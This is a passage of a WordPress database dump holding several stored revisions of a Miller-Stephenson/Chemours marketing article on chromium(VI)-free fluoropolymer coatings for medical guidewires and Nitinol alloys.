Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct, this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles behind.', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 16:50:25', '2017-02-15 16:50:25', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3619, 3, '2017-02-15 16:51:04', '2017-02-15 16:51:04', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via\r\n\r\n[caption id="attachment_3615" align="alignleft" width="286"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="286" height="191" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nspray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\n&nbsp;\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct, this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles behind.', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 16:51:04', '2017-02-15 16:51:04', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3620, 3, '2017-02-15 16:52:32', '2017-02-15 16:52:32', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="222"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="222" height="148" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\n&nbsp;\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct, this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles behind.', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 16:52:32', '2017-02-15 16:52:32', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3621, 3, '2017-02-15 16:52:53', '2017-02-15 16:52:53', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\n&nbsp;\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct, this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles behind.', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 16:52:53', '2017-02-15 16:52:53', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3622, 3, '2017-02-15 16:53:18', '2017-02-15 16:53:18', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct, this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles behind.', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 16:53:18', '2017-02-15 16:53:18', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3623, 3, '2017-02-15 18:00:04', '2017-02-15 18:00:04', '<h1><strong>Medical device manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical device market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system chosen.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system.  Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct, this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles behind. With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.', 'Medical Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 18:00:04', '2017-02-15 18:00:04', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3624, 3, '2017-02-15 18:16:51', '2017-02-15 18:16:51', '<h1><strong>Medical guidewire manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical guidewire market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation fluoropolymer coating which is chromium-VI free, yet has comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 18:16:51', '2017-02-15 18:16:51', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3625, 3, '2017-02-15 18:22:15', '2017-02-15 18:22:15', '<h1><strong>Medical guidewire manufacturers can leverage the thin-film,\r\nlubricity, and biocompatibility of Chemours/Miller-Stephensons\' fluoropolymers to meet the demanding requirements of their devices.</strong></h1>\r\n&nbsp;\r\n\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medicals application from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-15 18:22:15', '2017-02-15 18:22:15', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3626, 0, '2017-02-15 19:55:56', '2017-02-15 19:55:56', '', '', '', 'publish', 'closed', 'closed', '', '3626', '', '', '2017-02-15 19:55:56', '2017-02-15 19:55:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/3626/', 0, 'nf_sub', '', 0); 
